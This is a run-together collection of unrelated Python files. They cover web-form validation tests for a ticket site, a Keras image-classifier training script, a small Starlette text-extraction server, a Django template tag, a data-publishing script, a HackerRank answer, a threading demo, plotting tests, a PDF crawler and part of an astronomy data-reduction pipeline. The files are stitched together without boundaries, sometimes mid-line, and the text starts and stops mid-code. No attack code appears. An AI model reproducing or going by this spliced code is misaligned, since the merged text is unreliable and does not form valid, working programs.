"#message") self.assert_text_not_visible("Price of the ticket cannot be above 100", "#message") self.assert_text_not_visible("Expiration date is in invalid format", "#message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.1.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_alphanumeric_only(self, *_): """ Check if name of the ticket is alphanumeric-only """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "Ht1&t2@!*\")(/.,<>[]-+") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the " "first or the last character.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.1.2 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_spaces_only(self, *_): """ Check space is not allowed as first character """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", " t1") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the " "first or the last character.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.1.3 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_spaces_only2(self, *_): """ Check space is not allowed as last character """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1 ") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the " "first or the last character.", "#update_message") # open logout (for cleanup) self.open(base_url + 
'/logout') # Test Case R5.2.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_name_length(self, *_): """ The name of the ticket is no longer than 60 characters """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghi") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Ticket name cannot be longer than 60 characters", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.3.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_quantity_bound(self, *_): """ The quantity of the tickets has to be more than 0 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "0") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.3.2 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_quantity_bound2(self, *_): """ The quantity of the tickets has to be less than or equal to 100 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "101") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.4.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_price_bound(self, *_): """ Price cannot be lower than 10 """ # open logout page to invalid any logged-in sessions that may exist, 
then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "9") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Price has to be of range [10, 100]", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.4.2 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_price_bound2(self, *_): """ Price cannot be higher than 100 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "101") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Price has to be of range [10, 100]", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.5.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_date_format(self, *_): """ Date must be given in the format YYYYMMDD (e.g. 20200901) """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "Sept. 9 2021") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Date must be given in the format YYYYMMDD (e.g. 
20200901)", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.6.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) def test_ticket_exist(self, *_): """ The ticket of the given name must exist """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "thisTicketNoExist") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The ticket of the given name must exist", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.7.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_redirect_update(self, *_): """ For any errors, redirect back to / and show an error message """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "Sept. 
9 2021") # click update button self.click('input[value="Update"]') # assert proper header self.assert_element("#welcome-header") # open logout (for cleanup) self.open(base_url + '/logout') import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # ignore tf warnings about cuda from keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, GlobalAveragePooling2D, BatchNormalization, Dropout, Input, UpSampling2D from keras.metrics import CategoricalAccuracy from tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array from sklearn.metrics import classification_report, matthews_corrcoef from keras.losses import CosineSimilarity, CategoricalCrossentropy from keras.callbacks import EarlyStopping, LearningRateScheduler from keras.models import Sequential from keras.optimizers import Adam from pandas import DataFrame import tensorflow as tf import numpy as np import random import sys from utils import make_graphs, print_to_file, load_fmnist_pickle GLOBAL_EPOCHS = 100 def scheduler(epoch, lr): lrmin=0.0001 lrmax=0.001 step_size = 10 max_iter = GLOBAL_EPOCHS delta = 10 clr = lrmin + ((lrmax-lrmin)*(1.-np.fabs((epoch/step_size)-(2*np.floor(epoch/(2*step_size)))-1.))) clr_decay = clr/(1.+((delta-1.)*(epoch/max_iter))) return clr_decay VERBOSE = 1 if not VERBOSE: print("Change verbose to 1 to see messages.") last_epochs = list() mccs = list() dicts = list() histories = list() items = [10, 50, 250, 500] patiences = [20, 20, 20, 15] batch_sizes = [24, 32, 32, 32] for index, item in enumerate(items): # Load the dataset x_train, y_train, x_test, y_test = load_fmnist_pickle(id=item) if VERBOSE: print("Shape after loading: ", x_train.shape, y_train.shape, x_test.shape, y_test.shape) seed_value = 0 # 1. Set the `PYTHONHASHSEED` environment variable at a fixed value os.environ['PYTHONHASHSEED']=str(seed_value) # 2. Set the `python` built-in pseudo-random generator at a fixed value random.seed(seed_value) # 3. Set the `numpy` pseudo-random generator at a fixed value np.random.seed(seed_value) # 4. 
Set the `tensorflow` pseudo-random generator at a fixed value tf.random.set_seed(seed_value) def add_channel(image): img = array_to_img(image, scale=False) #returns PIL Image img = img.convert(mode='RGB') #makes 3 channels arr = img_to_array(img) #convert back to array return arr x_train *= 255 x_test *= 255 x_train = [add_channel(img) for img in x_train] x_test = [add_channel(img) for img in x_test] x_train = np.asarray(x_train, dtype='float32') x_test = np.asarray(x_test, dtype='float32') print(x_train.shape) print(y_train.shape) epochs = GLOBAL_EPOCHS learning_rate = 0.001 patience = patiences[index] num_classes = y_test.shape[1] # build model model = Sequential() model.add(Input(shape=(28, 28, 3))) model.add(UpSampling2D(size=(8,8), interpolation='nearest')) # Load updated weights from official repository transfer_learning_model = tf.keras.applications.EfficientNetB0(include_top=False, input_shape=(224, 224, 3), weights='../cifar10/efficientnet-b0/efficientnetb0_notop.h5') for layer in transfer_learning_model.layers[:-6]: layer.trainable = False model.add(transfer_learning_model) model.add(GlobalAveragePooling2D()) model.add(BatchNormalization()) model.add(Dropout(0.5)) model.add(Dense(num_classes, activation='softmax')) model.compile(loss=CosineSimilarity(axis=1), optimizer=Adam(), metrics=[CategoricalAccuracy()]) if VERBOSE: model.summary() datagen = ImageDataGenerator(rotation_range=25, zoom_range=[0.85,1.0], width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True, fill_mode='nearest') earlyStop = EarlyStopping(monitor='val_loss', mode='min', patience=patience, verbose=VERBOSE) history = model.fit(datagen.flow(x=x_train, y=y_train, batch_size=batch_sizes[index], seed=seed_value), validation_data=(x_test, y_test), epochs=epochs, batch_size=batch_sizes[index], verbose=VERBOSE, callbacks=[earlyStop, LearningRateScheduler(scheduler)], validation_batch_size=2500) histories.append(history) model.save(f"models/combinedda-{item}.h5") predictions = model.predict(x_test) y_test = np.argmax(y_test, axis=1) predictions = np.argmax(predictions, axis=1) dicts.append(classification_report(y_true=y_test, y_pred=predictions, digits=3, output_dict=True)) mccs.append(matthews_corrcoef(y_true=y_test, y_pred=predictions)) last_epochs.append(len(history.history['loss'])) print_to_file(dicts, mccs, items, epochs, batch_sizes, learning_rate, patiences, last_epochs, model, 'combinedda') make_graphs(histories, items, 'combinedda')app/server.py import os import sys import aiohttp import asyncio import uvicorn from starlette.applications import Starlette from starlette.middleware.cors import CORSMiddleware from starlette.responses import JSONResponse import json import textract as txrct import tempfile from base64 import b64decode app = Starlette() app.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type']) @app.route('/textract', methods=['POST']) async def textract(request): data = await request.body() data_json = json.loads(data) file_type = data_json['file_type'] file_dec = b64decode(data_json['data']) suffix = f'.{file_type}' with tempfile.NamedTemporaryFile(suffix=suffix, buffering=0) as t: t.write(file_dec) text = txrct.process(t.name) resp = {'text': text.decode('utf-8')} return JSONResponse(resp) @app.route('/status', methods=['GET']) def status(request): res = {'status': 'OK'} return JSONResponse(res) if __name__ == '__main__': if 'serve' in sys.argv: uvicorn.run(app=app, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)), 
log_level="info")from django import template register = template.Library() @register.simple_tag def duration(td): total_seconds = int(td.total_seconds()) hours = total_seconds // 3600 minutes = (total_seconds % 3600) // 60 return '{} h {} min'.format(hours, minutes) nhsengland/publish-o-maticdatasets/phof/transform.py """ No longer required/used """ import datetime import json import sys import ffs import re from publish.lib.helpers import filename_for_resource, download_file from publish.lib.upload import Uploader DATA_DIR = None PHOF_SUMMARY = """The Public Health Outcomes Framework Healthy lives, healthy people: Improving outcomes and supporting transparency sets out a vision for public health, desired outcomes and the indicators that will help us understand how well public health is being improved and protected. The framework concentrates on two high-level outcomes to be achieved across the public health system, and groups further indicators into four 'domains' that cover the full spectrum of public health. The outcomes reflect a focus not only on how long people live, but on how well they live at all stages of life. The data published in the tool are the baselines for the Public Health Outcomes Framework, with more recent and historical trend data where these are available. The baseline period is 2010 or equivalent, unless these data are unavailable or not deemed to be of sufficient quality. A list of indicators updated, for the most recent and previous releases can be found in the Public Health Outcomes Framework Collection within www.gov.uk. Data are published as part of a quarterly update cycle in August, November, February and May. Exact dates will be announced on the www.gov.uk statistical release calendar and this website. Public Health Outcomes Framework baseline data will be revised and corrected in accordance with the Code of Practice for Official Statistics. 
To provide comments and suggestions please e-mail .""" def add_metadata_to_ascof_datasets(): metadata_file = DATA_DIR/'dataset.metadata.json' metadata = metadata_file.json_load() metadata['tags'] = ['PHOF', 'Public Health Outcomes Framework'] metadata['title'] ='PHOF - Public Health Outcomes Framework' metadata['frequency'] = 'yearly' metadata['summary'] = PHOF_SUMMARY metadata['source'] = 'http://www.phoutcomes.info/public-health-outcomes-framework' metadata['coverage_start_date'] = '2000-01-01' metadata['coverage_end_date'] = '2013-12-31' u = Uploader("phof") for resource in metadata['resources']: filename = filename_for_resource(resource) path = DATA_DIR / filename download_file(resource['url'], path) print "Uploading to S3" url = u.upload(path) resource['url'] = url u.close() metadata_file.truncate() metadata_file << json.dumps(metadata, indent=2) return def main(workspace): global DATA_DIR DATA_DIR = ffs.Path(workspace) / 'data' add_metadata_to_ascof_datasets() return 0 if __name__ == '__main__': sys.exit(main(ffs.Path.here())) ''' Url: https://www.hackerrank.com/challenges/nested-list/problem Name: Nested Lists ''' if __name__ == '__main__': students = {} for _ in range(int(input())): name = input() score = float(input()) if score in students.keys(): students[score].append(name) else: students[score] = [name] keys = list(students.keys()) keys.sort() lowest = students[keys[1]] lowest.sort() for name in lowest: print(name) from dbSetup import dbClasses as db managerClass = db.getDBClass('MANAGER') orgClass = db.getDBClass('ORG') def addManager(userName, pswd, email, orgID): newManager = managerClass(USERNAME = userName, PASSWORD = pswd, EMAIL_ID = email, ORG_ID = orgID) db.session.add(newManager) db.session.commit() import random import time from concurrent.futures import ThreadPoolExecutor from threading import Lock, Thread, current_thread sticks = [Lock() for _ in range(5)] # we put sleep to simulate blocking operation ,so the other thread will enter def philospher(n): time.sleep(random.random()) with sticks[n]: print(f"{current_thread()} ,thread {n} is equired first lock {n}") time.sleep(random.random()) with sticks[(n + 1) % 5]: print(f"{current_thread()} ,thread {n} is equired second lock {(n+1)%5}") print("eating", n) time.sleep(random.random()) print(f"{current_thread()} ,thread {n} is realse second lock {(n+1)%5}") print(f"{current_thread()} ,thread {n} is realse first lock {n}") pool = ThreadPoolExecutor() phils = [Thread(target=philospher, args=(n,)) for n in range(5)] # phils2 = [pool.submit(philospher, n) for n in range(5)] for p in phils: p.start() # Copyright 2020 The Private Cardinality Estimation Framework Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
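# --- Aside (a minimal sketch, not part of any of the original files): the
# dining-philosophers snippet above has every thread acquire sticks[n] and then
# sticks[(n + 1) % 5], so if all five threads grab their first lock at the same
# time the program deadlocks. The usual fix is to take the two locks in a fixed
# global order, which makes a cycle of waiters impossible:
import random
import threading
import time

sticks = [threading.Lock() for _ in range(5)]

def philosopher(n):
    # Lock the lower-numbered stick first so all threads agree on the order.
    first, second = sorted((n, (n + 1) % 5))
    with sticks[first]:
        with sticks[second]:
            print(f"philosopher {n} is eating with sticks {first} and {second}")
            time.sleep(random.random())

threads = [threading.Thread(target=philosopher, args=(n,)) for n in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()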
"""Tests for wfa_cardinality_estimation_evaluation_framework.common.tests.plotting.""" from absl.testing import absltest import matplotlib import pandas as pd from wfa_cardinality_estimation_evaluation_framework.common import plotting def get_relative_error_by_num_sets(): return pd.DataFrame({ 'num_sets': [1, 1, 2, 1, 2, 2], 'relative_error': [0.05, -0.05, 0.1, 0.1, -0.1, -0.2]}) def get_df_for_test_barplot_frequency_distributions(): return pd.DataFrame({ 'run_index': [0, 0, 0, 0, 1, 1, 1, 1], 'cardinality_source': ['estimated_cardinality', 'estimated_cardinality', 'true_cardinality', 'true_cardinality'] * 2, 'frequency_level': [1, 2, 1, 2] * 2, 'cardinality_value': [12, 5, 10, 7, 8, 8, 10, 7] }) class PlottingTest(absltest.TestCase): def test_boxplot_relative_error_plot_xticks(self): df = get_relative_error_by_num_sets() ax = plotting.boxplot_relative_error( df, 'num_sets', 'relative_error') xlabels = [x.get_text() for x in ax.get_xticklabels()] expected = [str(x) for x in sorted(df['num_sets'].unique())] self.assertListEqual(xlabels, expected) def test_boxplot_relative_error_plot_returns(self): ax = plotting.boxplot_relative_error( get_relative_error_by_num_sets(), 'num_sets', 'relative_error') self.assertIsInstance(ax, matplotlib.axes.Axes) def test_boxplot_relative_error_plot_raise_column_not_found(self): msg = 'num_sets or relative_error not found in df.' with self.assertRaisesRegex(ValueError, msg): _ = plotting.boxplot_relative_error( get_relative_error_by_num_sets(), 'num_set', 'relative_error') with self.assertRaisesRegex(ValueError, msg): _ = plotting.boxplot_relative_error( get_relative_error_by_num_sets(), 'num_set', 'rel_err') def test_barplot_frequency_distributions_labels_correct(self): df = get_df_for_test_barplot_frequency_distributions() ax = plotting.barplot_frequency_distributions( df=df, frequency='frequency_level', cardinality='cardinality_value', source='cardinality_source') xlabels = [x.get_text() for x in ax.get_xticklabels()] self.assertListEqual(xlabels, ['1', '2'], 'The x-axis tick labels are not correct.') self.assertEqual(ax.get_xlabel(), 'Per frequency level', 'The x-axis label is not correct') self.assertEqual(ax.get_ylabel(), 'Cardinality', 'The y-axis label is not correct') def test_barplot_frequency_distributions_returns(self): df = get_df_for_test_barplot_frequency_distributions() ax = plotting.barplot_frequency_distributions( df=df, frequency='frequency_level', cardinality='cardinality_value', source='cardinality_source') self.assertIsInstance(ax, matplotlib.axes.Axes) if __name__ == '__main__': absltest.main() import os from selenium import webdriver from selenium.webdriver.firefox.options import Options from bs4 import BeautifulSoup from urllib import request class Spy: def __init__(self, domain, out_dir): self.domain = domain self.out_dir = out_dir os.makedirs(self.out_dir, exist_ok=True) options = Options() options.headless = True self.driver = webdriver.Firefox(firefox_options=options) def crawl(self, dm=None): if dm is None: dm = self.domain self.driver.get(dm) content = self.driver.page_source soup = BeautifulSoup(content, 'html.parser') list_documents = soup.find_all('a', class_='doc_list_link', href=True) next_page_action = soup.find_all('a', class_='pageAction', href=True)[0] for doc in list_documents: self.download_pdf(doc['href']) self.crawl(next_page_action['href']) def download_pdf(self, link): self.driver.get(link) content = self.driver.page_source soup = BeautifulSoup(content, 'html.parser') pdf_link = soup.find_all('a', 
class_='doc_detail_file_link', href=True) for li in pdf_link: print('Downloading', li['href']) request.urlretrieve(li['href'], os.path.join(self.out_dir, li['href'].split('/')[-1])) def __del__(self): self.driver.quit() print('DONE') """ Automatically Classify and Reduce a given Data Set """ from astropy.io import fits from collections import defaultdict import os import sys import datetime from pynot import alfosc from pynot.data import io from pynot.data import organizer as do from pynot.calibs import combine_bias_frames, combine_flat_frames, normalize_spectral_flat from pynot.extraction import auto_extract from pynot import extract_gui from pynot.functions import get_options, get_version_number from pynot.wavecal import rectify, WavelengthError from pynot.identify_gui import create_pixtable from pynot.scired import raw_correction, auto_fit_background, correct_cosmics, correct_raw_file from pynot.response import calculate_response, flux_calibrate from PyQt5.QtWidgets import QApplication code_dir = os.path.dirname(os.path.abspath(__file__)) calib_dir = os.path.join(code_dir, 'calib/') defaults_fname = os.path.join(calib_dir, 'default_options.yml') __version__ = get_version_number() class Report(object): def __init__(self, verbose=False): self.verbose = verbose self.time = datetime.datetime.now() self.fname = 'pynot_%s.log' % self.time.strftime('%d%b%Y-%Hh%Mm%S') self.remarks = list() self.lines = list() self.header = """ # PyNOT Data Processing Pipeline # ================================ # version %s %s """ % (__version__, self.time.strftime("%b %d, %Y %H:%M:%S")) self.report = "" if self.verbose: print(self.header) def clear(self): self.lines = list() self.remarks = list() def set_filename(self, fname): self.fname = fname def commit(self, text): if self.verbose: print(text, end='', flush=True) self.lines.append(text) def error(self, text): text = ' [ERROR] - ' + text if self.verbose: print(text) if text[-1] != '\n': text += '\n' self.lines.append(text) def warn(self, text): text = '[WARNING] - ' + text if self.verbose: print(text) if text[-1] != '\n': text += '\n' self.lines.append(text) def write(self, text, prefix=' - '): text = prefix + text if self.verbose: print(text) if text[-1] != '\n': text += '\n' self.lines.append(text) def add_linebreak(self): if self.verbose: print("") self.lines.append("\n") def add_remark(self, text): self.remarks.append(text) def _make_report(self): remark_str = ''.join(self.remarks) lines_str = ''.join(self.lines) self.report = '\n'.join([self.header, remark_str, lines_str]) def print_report(self): self._make_report() print(self.report) def save(self): self._make_report() with open(self.fname, 'w') as output: output.write(self.report) def exit(self): print(" - Pipeline terminated.") print(" Consult the log: %s\n" % self.fname) self.save() def fatal_error(self): print(" !! 
FATAL ERROR !!") print(" Consult the log: %s\n" % self.fname) self.save() class State(dict): """A collection of variables for the pipeline, such as arc line ID tables etc.""" def __init__(self): dict.__init__(self, {}) self.current = '' def print_current_state(self): print(self.current) def set_current_state(self, state): self.current = state def run_pipeline(options_fname, object_id=None, verbose=False, interactive=False): log = Report(verbose) status = State() global app app = QApplication(sys.argv) # -- Parse Options from YAML options = get_options(defaults_fname) user_options = get_options(options_fname) for section_name, section in user_options.items(): if isinstance(section, dict): options[section_name].update(section) else: options[section_name] = section if object_id is None: pass elif isinstance(object_id, str): object_id = [object_id] elif isinstance(object_id, list): if isinstance(object_id[0], str): pass else: log.error("Wrong input type for `object id`. Must be list of strings") log.error("not list of %r" % type(object_id[0])) log.fatal_error() return else: log.error("Wrong input type for `object id`. Must be string or list of strings") log.error("not %r" % type(object_id)) log.fatal_error() return if interactive: # Set all interactive steps to True options['identify']['interactive'] = True options['identify']['all'] = True options['extract']['interactive'] = True options['response']['interactive'] = True dataset_fname = options['dataset'] if dataset_fname and os.path.exists(dataset_fname): # -- load collection database = io.load_database(dataset_fname) log.write("Loaded file classification database: %s" % dataset_fname) # -- reclassify (takes already identified files into account) else: log.error("Dataset does not exist : %s" % dataset_fname) log.fatal_error() return # -- Organize object files in dataset: if 'SPEC_OBJECT' not in database: log.error("No spectroscopic data found in the dataset!") log.error("Check the classification table... object type 'SPEC_OBJECT' missing") log.fatal_error() return object_filelist = database['SPEC_OBJECT'] object_images = list(map(do.RawImage, object_filelist)) log.add_linebreak() log.write(" - The following objects were found in the dataset:", prefix='') log.write(" OBJECT GRISM SLIT EXPTIME FILENAME", prefix='') for sci_img in object_images: output_variables = (sci_img.object, sci_img.grism, sci_img.slit, sci_img.exptime, os.path.basename(sci_img.filename)) log.write("%20s %9s %11s %5.0f %s" % output_variables, prefix='') log.add_linebreak() # get list of unique grisms in dataset: grism_list = list() for sci_img in object_images: grism_name = alfosc.grism_translate[sci_img.grism] if grism_name not in grism_list: grism_list.append(grism_name) # -- Check arc line files: arc_images = list() # for arc_type in ['ARC_He', 'ARC_HeNe', 'ARC_Ne', 'ARC_ThAr']: for arc_type in ['ARC_HeNe', 'ARC_ThAr']: # For now only HeNe arc lines are accepted! # Implement ThAr and automatic combination of He + Ne if arc_type in database.keys(): arc_images += database[arc_type] if len(arc_images) == 0: log.error("No arc line calibration data found in the dataset!") log.error("Check the classification table... 
object type 'ARC_HeNe' or 'ARC_ThAr' missing") log.fatal_error() return arc_images_for_grism = defaultdict(list) for arc_img in arc_images: raw_grism = fits.getheader(arc_img)['ALGRNM'] this_grism = alfosc.grism_translate[raw_grism] arc_images_for_grism[this_grism].append(arc_img) for grism_name in grism_list: if len(arc_images_for_grism[grism_name]) == 0: log.error("No arc frames defined for grism: %s" % grism_name) log.fatal_error() return else: log.write("%s has necessary arc files." % grism_name) log.add_linebreak() identify_all = options['identify']['all'] identify_interactive = options['identify']['interactive'] if identify_interactive and identify_all: grisms_to_identify = [] log.write("Identify: interactively reidentify arc lines for all objects") log.add_linebreak() elif identify_interactive and not identify_all: # Make pixeltable for all grisms: grisms_to_identify = grism_list log.write("Identify: interactively identify all grisms in dataset:") log.write(", ".join(grisms_to_identify)) log.add_linebreak() else: # Check if pixeltables exist: grisms_to_identify = [] for grism_name in grism_list: pixtab_fname = os.path.join(calib_dir, '%s_pixeltable.dat' % grism_name) if not os.path.exists(pixtab_fname): log.write("%s : pixel table does not exist. Will identify lines..." % grism_name) grisms_to_identify.append(grism_name) else: log.write("%s : pixel table already exists" % grism_name) status[grism_name+'_pixtab'] = pixtab_fname status[pixtab_fname] = options['identify']['order_wl'] log.add_linebreak() # Identify interactively for grisms that are not defined # add the new pixel tables to the calib cache for future use for grism_name in grisms_to_identify: log.write("Starting interactive definition of pixel table for %s" % grism_name) try: arc_fname = arc_images_for_grism[grism_name][0] if grism_name+'_pixtab' in options: pixtab_fname = options[grism_name+'_pixtab'] else: pixtab_fname = os.path.join(calib_dir, '%s_pixeltable.dat' % grism_name) linelist_fname = '' log.write("Input arc line frame: %s" % arc_fname) poly_order, saved_pixtab_fname, msg = create_pixtable(arc_fname, grism_name, pixtab_fname, linelist_fname, order_wl=options['identify']['order_wl'], app=app) status[saved_pixtab_fname] = poly_order status[grism_name+'_pixtab'] = saved_pixtab_fname log.commit(msg) except: log.error("Identification of arc lines failed!") log.fatal_error() log.save() print("Unexpected error:", sys.exc_info()[0]) raise # Save overview log: print("") print(" - Pipeline setup ended successfully.") print(" Consult the overview log: %s\n\n" % log.fname) log.save() # ------------------------------------------------------------------ # -- Start Main Reduction: if object_id is None: # Loop over all: objects_to_reduce = object_images else: objects_to_reduce = list() for img in object_images: if img.object in object_id: objects_to_reduce.append(img) if len(objects_to_reduce) == 0: log.error("No data matched the given object ID: %r" % object_id) log.fatal_error() return for sci_img in objects_to_reduce: # Create working directory: raw_base = os.path.basename(sci_img.filename).split('.')[0][2:] output_dir = sci_img.target_name + '_' + raw_base if not os.path.exists(output_dir): os.mkdir(output_dir) # Start new log in working directory: log_fname = os.path.join(output_dir, 'pynot.log') log.clear() log.set_filename(log_fname) log.write("Starting PyNOT Longslit Spectroscopic Reduction") log.add_linebreak() log.write("Target Name: %s" % sci_img.target_name) log.write("Input Filename: %s" % sci_img.filename) 
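# --- Aside (an isolated sketch, not PyNOT code): the arc frames above are
# grouped per grism with collections.defaultdict(list), a compact way to build
# a "key -> list of items" mapping without pre-creating each bucket. The same
# pattern on its own, with a stand-in key function instead of reading the
# ALGRNM header keyword:
from collections import defaultdict

def group_by(items, key):
    """Return a dict mapping key(item) to the list of matching items."""
    groups = defaultdict(list)
    for item in items:
        groups[key(item)].append(item)
    return dict(groups)

# e.g. grouping filenames by extension, analogous to grouping arcs by grism
print(group_by(["a.fits", "b.fits", "c.dat"], key=lambda name: name.rsplit(".", 1)[-1]))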
